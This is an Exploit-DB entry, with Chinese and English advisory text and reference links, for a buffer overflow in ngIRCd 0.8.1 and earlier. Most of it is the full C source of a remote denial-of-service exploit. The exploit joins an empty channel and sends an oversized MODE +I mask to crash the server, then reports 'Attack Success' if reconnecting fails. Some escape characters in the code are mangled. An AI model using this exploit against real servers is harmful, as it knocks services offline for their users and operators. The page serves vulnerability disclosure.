https://www.exploit-db.com/exploits/25070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-293

ngIRCd0.8.2之前版本的lists.c中包含的Lists_MakeMask()函数存在整数下溢漏洞，远程攻击者可以通过较长的可引起不正确长度计算的MODE行来引发拒绝服务(应用程序崩溃)攻击，以及可能执行任意代码，从而导致缓冲区溢出。

source: http://www.securityfocus.com/bid/12397/info

ngIRCd is reported prone to a remote buffer overflow vulnerability. This issue presents itself because the application fails to perform proper boundary checks before copying user-supplied data into process buffers.

A successful attack may allow the attacker to crash the server or gain unauthorized access to a vulnerable computer.

ngIRCd 0.8.1 and prior versions are affected by this vulnerability. 

/*
      NGircd <= 0.8.1     Remote Denial Of Service       Coded by: Expanders

      Usage:  ./ngircd_dos <Host> <Ip> <NickToUse> <ChannellToJoin>

   NOTE:  The channel must be EMPTY to let the exploit use +I mode

      Example:

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {
     struct sockaddr_in trg;
     struct hostent *he;
 long addr;
     int sockfd, buff,rc;
 char evilbuf[1024];
 char buffer[1024];
 char *nick="AntiServer";
 char *channel="Die_NGircd";
 char *request;
 if(argv[3] != NULL) nick=argv[3];
 if(argv[4] != NULL) channel=argv[4];
 if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
 printf("nn-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-n");
     he = gethostbyname(argv[1]);
     sockfd = socket(AF_INET, SOCK_STREAM, 0);
     request = (char *) malloc(12344);
     trg.sin_family = AF_INET;
     trg.sin_port = htons(atoi(argv[2]));
     trg.sin_addr = *((struct in_addr *) he->h_addr);
     memset(&(trg.sin_zero), '', 8);
 printf("nnConnecting to target t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
  printf("[Done]nBuilding evil buffert...");
  memset(evilbuf,65,300);
  memset(evilbuf+300,64,1);
  memset(evilbuf+301,65,128);
  printf("[Done]nSending NICK           t...");
  sprintf(request,"NICK %sn",nick);
  send(sockfd,request,strlen(request),0);
  printf("[Done]nSending USER           t...");
  sprintf(request,"USER %s x0n3-h4ck.org eth0.x0n3-h4ck.org
:%sn",nick,nick);
  send(sockfd,request,strlen(request),0);
  buff=recv(sockfd, buffer, 256, 0);
  printf("[Done]nJoining Channel        t...");
  sprintf(request,"JOIN #%sn",channel);
  send(sockfd,request,strlen(request),0);
  printf("[Done]nSending evil request   t...");
  sprintf(request,"MODE #%s +I %sn",channel,evilbuf);
  send(sockfd,request,strlen(request),0);
  sprintf(request,"QUIT www.x0n3-h4ck.orgn",evilbuf);
  send(sockfd,request,strlen(request),0);
  sleep(2);
  printf("[Done]nTrying to reconnectt...");
  close(sockfd);
  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  sleep(1);
  rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
  if(rc==0)
   printf("[Fail] -> Damn! Attack Failed!nn");
  else
   printf("[Done] -> Attack Success! Lets party!nn");
 }
 else
  printf("[Fail] -> Unable to connectnn");
 close(sockfd);
 return 0;

}

void help(char *program_name) {

 printf("nt-=[      NGircd <= 0.8.1 Remote Denial Of Service      ]=-n");
 printf("t-=[                                                    ]=-n");
 printf("t-=[      Coded by
ders -/www.x0n3-h4ck.org\-      ]=-nn");
 printf("Usage: %s <Host> <Ip> <NickToUse>
<ChannellToJoin>n",program_name);
}

来源:XF
名称:ngircd-listmakemask-bo(19143)
链接:http://xforce.iss.net/xforce/xfdb/19143
来源:BID
名称:12397
链接:http://www.securityfocus.com/bid/12397
来源:GENTOO
名称:GLSA-200501-40
链接:http://www.gentoo.org/security/en/glsa/glsa-200501-40.xml
来源:MLIST
名称:[ngIRCd-ML]20050126ngIRCd0.8.2
链接:http://arthur.ath.cx/pipermail/ngircd-ml/2005-January/000228.html
来源:bugs.gentoo.org
链接:http://bugs.gentoo.org/show_bug.cgi?id=79705
来源:SECTRACK
名称:1013047
链接:http://securitytracker.com/id?1013047
来源:SECUNIA
名称:14059
链接:http://secunia.com/advisories/14059
来源:SECUNIA
名称:14056
链接:http://secunia.com/advisories/14056